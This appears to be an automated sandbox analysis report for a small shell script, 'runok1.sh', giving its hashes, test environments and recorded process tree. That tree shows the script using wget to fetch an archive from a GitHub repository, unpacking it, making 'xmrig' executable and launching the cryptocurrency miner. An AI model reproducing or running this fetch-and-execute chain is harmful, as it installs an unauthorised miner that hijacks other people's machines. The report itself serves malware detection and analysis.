Analysis
-
max time kernel
0s -
max time network
1678s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
17-10-2024 04:13
Static task
static1
Behavioral task
behavioral1
Sample
runok1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runok1.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral3
Sample
runok1.sh
Resource
ubuntu2204-amd64-20240729-en
Behavioral task
behavioral4
Sample
runok1.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runok1.sh
-
Size
138B
-
MD5
ed44ae7cc01f7bcc21c98a523afabd7c
-
SHA1
4e7f50162eeb61715a948d3359639c6910088860
-
SHA256
1663e111eceb895f9be9e87c6cfda675e506cd8ec88d144fd1a2b5dc7081d0de
-
SHA512
e1c895b50b2b259d40501497ae4f9b2bb77b2d8713cd584d9c83cab82898f5e134ba6c8320810bf649867156494ea5b656143b71e269c9490da210d48a52982c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 1517 chmod -
Processes:
tardescription ioc Process File opened for reading /proc/filesystems tar
Processes
-
/tmp/runok1.sh/tmp/runok1.sh1⤵PID:1511
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok.tar.gz2⤵PID:1512
-
-
/bin/tartar xvf ok.tar.gz2⤵
- Reads runtime system information
PID:1513
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/xmrig./xmrig2⤵PID:1518
-